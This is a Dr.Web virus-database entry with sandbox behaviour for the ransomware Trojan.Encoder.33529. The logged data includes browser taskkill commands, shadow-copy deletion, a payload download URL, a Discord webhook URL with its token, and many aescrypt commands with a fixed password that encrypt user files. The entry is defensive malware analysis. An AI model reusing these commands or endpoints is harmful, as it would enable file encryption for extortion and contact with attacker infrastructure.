マイライブラリ
マイライブラリ

+ マイライブラリに追加

電話

お問い合わせ履歴

電話(英語)

+7 (495) 789-45-86

Profile

Trojan.Encoder.33529

Added to the Dr.Web virus database: 2021-03-01

Virus description added:

Technical Information

To ensure autorun and distribution
Creates or modifies the following files
  • %APPDATA%\microsoft\windows\start menu\programs\startup\<File name>.exe
  • <SYSTEM32>\tasks\updatewuauclt
  • <SYSTEM32>\tasks\updatewuauclthelper
Malicious functions
To complicate detection of its presence in the operating system,
blocks execution of the following system utilities:
  • Windows Task Manager (Taskmgr)
deletes volume shadow copies.
Executes the following
  • '<SYSTEM32>\taskkill.exe' /f /im opera.exe
  • '<SYSTEM32>\taskkill.exe' /f /im chrome.exe
  • '<SYSTEM32>\taskkill.exe' /f /im firefox.exe
  • '<SYSTEM32>\taskkill.exe' /f /im iexplore.exe
Downloads files.
Downloads
  • https://cdn-35.anonfiles.com/9821w1g5p3/8a0b1f8a-1613613819/gameover.exe as %temp%\final.exe
Terminates or attempts to terminate
the following user processes:
  • firefox.exe
  • iexplore.exe
Modifies file system
Creates the following files
  • %TEMP%\e35c.tmp\e35d.tmp\extd.exe
  • %HOMEPATH%\desktop\pay2decrypt22.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt23.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt24.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt25.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt26.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt27.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt28.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt29.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt3.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt30.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt20.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt21.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt31.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt34.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt35.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt36.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt37.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt38.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt39.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt4.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt40.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt41.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt42.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt32.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt33.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt44.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt43.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt18.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt51.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt94.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt93.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt92.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt91.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt90.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt9.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt89.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt88.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt19.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt95.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt2.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt87.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt10.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt100.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt11.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt12.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt13.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt14.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt15.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt16.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt17.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt86.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt85.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt1.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt50.txt
  • %HOMEPATH%\desktop\pay2decrypt45.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt73.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt75.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt76.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt77.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt78.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt79.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt8.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt80.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt81.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt82.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt72.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt83.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt74.txt.lck
  • %HOMEPATH%\desktop\pmd.cer.lck
  • %HOMEPATH%\desktop\telegram.lnk.lck
  • %HOMEPATH%\desktop\sdkfailsafeemulator.cer.lck
  • %HOMEPATH%\desktop\iisstart.htm.lck
  • %HOMEPATH%\desktop\iisstart.html.lck
  • %HOMEPATH%\desktop\testee.cer.lck
  • %HOMEPATH%\desktop\ituneshelpunavailable.htm.lck
  • %HOMEPATH%\desktop\icq.lnk.lck
  • %HOMEPATH%\desktop\advice_process.htm.lck
  • %HOMEPATH%\desktop\dialmap.bmp.lck
  • %HOMEPATH%\desktop\tree_view.html.lck
  • %HOMEPATH%\desktop\pay2decrypt71.txt.lck
  • %HOMEPATH%\desktop\sdksampleunprivdeveloper.cer.lck
  • %HOMEPATH%\desktop\pay2decrypt70.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt7.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt47.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt49.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt5.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt50.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt84.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt52.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt53.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt54.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt55.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt56.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt57.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt58.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt48.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt59.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt60.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt61.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt62.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt63.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt64.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt65.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt66.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt67.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt68.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt69.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt96.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt6.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt99.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt97.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt98.txt.lck
  • %HOMEPATH%\desktop\desktop.ini.lck
  • %HOMEPATH%\desktop\pay2decrypt26.txt
  • %HOMEPATH%\desktop\pay2decrypt27.txt
  • %HOMEPATH%\desktop\pay2decrypt28.txt
  • %HOMEPATH%\desktop\pay2decrypt29.txt
  • %HOMEPATH%\desktop\pay2decrypt30.txt
  • %HOMEPATH%\desktop\pay2decrypt31.txt
  • %HOMEPATH%\desktop\pay2decrypt32.txt
  • %HOMEPATH%\desktop\pay2decrypt33.txt
  • %HOMEPATH%\desktop\pay2decrypt34.txt
  • %HOMEPATH%\desktop\pay2decrypt23.txt
  • %HOMEPATH%\desktop\pay2decrypt21.txt
  • %HOMEPATH%\desktop\pay2decrypt25.txt
  • %HOMEPATH%\desktop\pay2decrypt35.txt
  • %HOMEPATH%\desktop\pay2decrypt39.txt
  • %HOMEPATH%\desktop\pay2decrypt40.txt
  • %HOMEPATH%\desktop\pay2decrypt41.txt
  • %HOMEPATH%\desktop\pay2decrypt42.txt
  • %HOMEPATH%\desktop\pay2decrypt43.txt
  • %HOMEPATH%\desktop\pay2decrypt44.txt
  • %HOMEPATH%\desktop\pay2decrypt45.txt
  • %HOMEPATH%\desktop\pay2decrypt46.txt
  • %HOMEPATH%\desktop\pay2decrypt47.txt
  • %HOMEPATH%\desktop\pay2decrypt36.txt
  • %HOMEPATH%\desktop\pay2decrypt37.txt
  • %HOMEPATH%\desktop\pay2decrypt38.txt
  • %HOMEPATH%\desktop\pay2decrypt22.txt
  • %HOMEPATH%\desktop\pay2decrypt20.txt
  • %HOMEPATH%\desktop\pay2decrypt48.txt
  • %TEMP%\e35c.tmp\aescrypt.exe
  • %TEMP%\e35c.tmp\discordsendwebhook.exe
  • nul
  • %TEMP%\kill.bat
  • %TEMP%\p2d.bat
  • %HOMEPATH%\desktop\pay2decrypt1.txt
  • %HOMEPATH%\desktop\pay2decrypt2.txt
  • %HOMEPATH%\desktop\pay2decrypt3.txt
  • %HOMEPATH%\desktop\pay2decrypt4.txt
  • %HOMEPATH%\desktop\pay2decrypt5.txt
  • %HOMEPATH%\desktop\pay2decrypt6.txt
  • %TEMP%\e35c.tmp\e35d.tmp\e35e.bat
  • %HOMEPATH%\desktop\pay2decrypt7.txt
  • %HOMEPATH%\desktop\pay2decrypt9.txt
  • %HOMEPATH%\desktop\pay2decrypt10.txt
  • %HOMEPATH%\desktop\pay2decrypt11.txt
  • %HOMEPATH%\desktop\pay2decrypt12.txt
  • %HOMEPATH%\desktop\pay2decrypt13.txt
  • %HOMEPATH%\desktop\pay2decrypt14.txt
  • %HOMEPATH%\desktop\pay2decrypt15.txt
  • %HOMEPATH%\desktop\pay2decrypt16.txt
  • %HOMEPATH%\desktop\pay2decrypt17.txt
  • %HOMEPATH%\desktop\pay2decrypt18.txt
  • %HOMEPATH%\desktop\pay2decrypt19.txt
  • %HOMEPATH%\desktop\pay2decrypt8.txt
  • %HOMEPATH%\desktop\alert.html.lck
  • %HOMEPATH%\desktop\pay2decrypt46.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt49.txt
  • %HOMEPATH%\desktop\pay2decrypt53.txt
  • %HOMEPATH%\desktop\pay2decrypt83.txt
  • %HOMEPATH%\desktop\pay2decrypt84.txt
  • %HOMEPATH%\desktop\pay2decrypt85.txt
  • %HOMEPATH%\desktop\pay2decrypt86.txt
  • %HOMEPATH%\desktop\pay2decrypt87.txt
  • %HOMEPATH%\desktop\pay2decrypt88.txt
  • %HOMEPATH%\desktop\pay2decrypt89.txt
  • %HOMEPATH%\desktop\pay2decrypt90.txt
  • %HOMEPATH%\desktop\pay2decrypt91.txt
  • %HOMEPATH%\desktop\pay2decrypt80.txt
  • %HOMEPATH%\desktop\pay2decrypt92.txt
  • %HOMEPATH%\desktop\pay2decrypt82.txt
  • %HOMEPATH%\desktop\pay2decrypt94.txt
  • %HOMEPATH%\desktop\pay2decrypt96.txt
  • %HOMEPATH%\desktop\pay2decrypt97.txt
  • %HOMEPATH%\desktop\pay2decrypt98.txt
  • %HOMEPATH%\desktop\pay2decrypt99.txt
  • %HOMEPATH%\desktop\pay2decrypt100.txt
  • %WINDIR%\temp\cabad9d.tmp
  • %WINDIR%\temp\tarad9e.tmp
  • %TEMP%\final.exe
  • %TEMP%\e35c.tmp\e35d.tmp\e35f.tmp
  • %HOMEPATH%\desktop\pay2decrypt93.txt
  • %HOMEPATH%\desktop\pay2decrypt24.txt
  • %HOMEPATH%\desktop\pay2decrypt95.txt
  • %HOMEPATH%\desktop\pay2decrypt81.txt
  • %HOMEPATH%\desktop\pay2decrypt79.txt
  • %HOMEPATH%\desktop\pay2decrypt78.txt
  • %HOMEPATH%\desktop\pay2decrypt54.txt
  • %HOMEPATH%\desktop\pay2decrypt55.txt
  • %HOMEPATH%\desktop\pay2decrypt56.txt
  • %HOMEPATH%\desktop\pay2decrypt57.txt
  • %HOMEPATH%\desktop\pay2decrypt58.txt
  • %HOMEPATH%\desktop\pay2decrypt59.txt
  • %HOMEPATH%\desktop\pay2decrypt60.txt
  • %HOMEPATH%\desktop\pay2decrypt61.txt
  • %HOMEPATH%\desktop\pay2decrypt62.txt
  • %HOMEPATH%\desktop\pay2decrypt63.txt
  • %HOMEPATH%\desktop\pay2decrypt52.txt
  • %HOMEPATH%\desktop\pay2decrypt64.txt
  • %HOMEPATH%\desktop\pay2decrypt66.txt
  • %HOMEPATH%\desktop\pay2decrypt67.txt
  • %HOMEPATH%\desktop\pay2decrypt68.txt
  • %HOMEPATH%\desktop\pay2decrypt69.txt
  • %HOMEPATH%\desktop\pay2decrypt70.txt
  • %HOMEPATH%\desktop\pay2decrypt71.txt
  • %HOMEPATH%\desktop\pay2decrypt72.txt
  • %HOMEPATH%\desktop\pay2decrypt73.txt
  • %HOMEPATH%\desktop\pay2decrypt74.txt
  • %HOMEPATH%\desktop\pay2decrypt75.txt
  • %HOMEPATH%\desktop\pay2decrypt76.txt
  • %HOMEPATH%\desktop\pay2decrypt65.txt
  • %HOMEPATH%\desktop\pay2decrypt77.txt
  • %HOMEPATH%\desktop\pay2decrypt51.txt
  • %HOMEPATH%\desktop\dashborder_192.bmp.lck
Sets the 'hidden' attribute to the following files
  • <Full path to file>
  • %TEMP%\e35c.tmp\aescrypt.exe
  • %TEMP%\e35c.tmp\discordsendwebhook.exe
Deletes the following files
  • %WINDIR%\temp\cabad9d.tmp
  • %WINDIR%\temp\tarad9e.tmp
  • %TEMP%\e35c.tmp\e35d.tmp\e35f.tmp
Changes user data files extensions (Trojan.Encoder).
Network activity
Connects to
  • 'di##ord.com':443
  • 'cd####.anonfiles.com':443
  • 'microsoft.com':80
TCP
  • 'di##ord.com':443
  • 'cd####.anonfiles.com':443
  • 'an###iles.com':443
UDP
  • DNS ASK di##ord.com
  • DNS ASK cd####.anonfiles.com
  • DNS ASK microsoft.com
  • DNS ASK an###iles.com
  • DNS ASK st####.rapidssl.com
Miscellaneous
Searches for the following windows
  • ClassName: '' WindowName: ''
Creates and executes the following
  • '%TEMP%\e35c.tmp\discordsendwebhook.exe' -m ":writing_hand: LEAKGAP: Crypting Files..." -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dialmap.bmp.lck" "dialmap.bmp"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "alert.html.lck" "alert.html"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dashBorder_192.bmp.lck" "dashBorder_192.bmp"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "168.jpeg.lck" "168.jpeg"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "howto-index.html.lck" "howto-index.html"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "210252809.jpeg.lck" "210252809.jpeg"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "pushkin.jpeg.lck" "pushkin.jpeg"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "february_catalogue__2015.doc.lck" "february_catalogue__2015.doc"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt83.txt.lck" "Pay2Decrypt83.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "2.jpeg.lck" "2.jpeg"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "lisp_success.doc.lck" "lisp_success.doc"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dotnetfx45_full_setup.exe.lck" "dotnetfx45_full_setup.exe"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "uep_form_786_bulletin_1726i602.doc.lck" "uep_form_786_bulletin_1726i602.doc"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "skypesetup.exe.lck" "skypesetup.exe"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "wrar520.exe.lck" "wrar520.exe"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "tcm851ax32.exe.lck" "tcm851ax32.exe"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ntuser.ini.lck" "ntuser.ini"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Mail.Ru.lck" "Mail.Ru"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "advice_process.htm.lck" "advice_process.htm"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ICQ.lnk.lck" "ICQ.lnk"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "iTunesHelpUnavailable.htm.lck" "iTunesHelpUnavailable.htm"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "testEE.cer.lck" "testEE.cer"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt75.txt.lck" "Pay2Decrypt75.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt76.txt.lck" "Pay2Decrypt76.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt77.txt.lck" "Pay2Decrypt77.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt78.txt.lck" "Pay2Decrypt78.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt79.txt.lck" "Pay2Decrypt79.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt8.txt.lck" "Pay2Decrypt8.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt80.txt.lck" "Pay2Decrypt80.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt81.txt.lck" "Pay2Decrypt81.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ntuser.pol.lck" "ntuser.pol"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "nwfieldnotes1966.docx.lck" "nwfieldnotes1966.docx"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt82.txt.lck" "Pay2Decrypt82.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "pmd.cer.lck" "pmd.cer"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Total.lck" "Total"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "SDKSampleUnprivDeveloper.cer.lck" "SDKSampleUnprivDeveloper.cer"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Telegram.lnk.lck" "Telegram.lnk"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "QIP.lck" "QIP"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "SDKFailsafeEmulator.cer.lck" "SDKFailsafeEmulator.cer"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "iisstart.htm.lck" "iisstart.htm"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "iisstart.html.lck" "iisstart.html"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt74.txt.lck" "Pay2Decrypt74.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "tree_view.html.lck" "tree_view.html"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "CVRF2A3.tmp.cvr.lck" "CVRF2A3.tmp.cvr"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "RGIE195.tmp.lck" "RGIE195.tmp"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM...
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dd_NDP471-KB4033342-x86-x64-AllOS-ENU_decompression_log.txt.lck" "dd_NDP471-KB4033342-x86-x64-AllOS-ENU_decompression_log.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dd_NDP452-KB2901907-x86-x64-AllOS-ENU_decompression_log.txt.lck" "dd_NDP452-KB2901907-x86-x64-AllOS-ENU_decompression_log.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "AdobeSFX.log.lck" "AdobeSFX.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dotNetFx.log.lck" "dotNetFx.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dotNetFxSDK.log.lck" "dotNetFxSDK.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dd_wcf_CA_smci_20200611_031101_060.txt.lck" "dd_wcf_CA_smci_20200611_031101_060.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dd_wcf_CA_smci_20151217_052908_497.txt.lck" "dd_wcf_CA_smci_20151217_052908_497.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ASPNETSetup_00001.log.lck" "ASPNETSetup_00001.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ASPNETSetup_00003.log.lck" "ASPNETSetup_00003.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ASPNETSetup_00000.log.lck" "ASPNETSetup_00000.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dd_wcf_CA_smci_20200611_031056_919.txt.lck" "dd_wcf_CA_smci_20200611_031056_919.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dd_wcf_CA_smci_20151217_052858_840.txt.lck" "dd_wcf_CA_smci_20151217_052858_840.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ASPNETSetup_00002.log.lck" "ASPNETSetup_00002.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dd_SetupUtility.txt.lck" "dd_SetupUtility.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ASPNETSetup.log.lck" "ASPNETSetup.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "RGIE195.tmp-tmp.lck" "RGIE195.tmp-tmp"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "RGI8564.tmp-tmp.lck" "RGI8564.tmp-tmp"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "p2d.bat.lck" "p2d.bat"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "AdobeARM_NotLocked.log.lck" "AdobeARM_NotLocked.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "wmsetup.log.lck" "wmsetup.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "MSIeb217.LOG.lck" "MSIeb217.LOG"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "JavaDeployReg.log.lck" "JavaDeployReg.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "NTUSER.DAT.lck" "NTUSER.DAT"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ntuser.ini.lck.lck" "ntuser.ini.lck"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ntuser.pol.lck.lck" "ntuser.pol.lck"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.lck.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.lck"
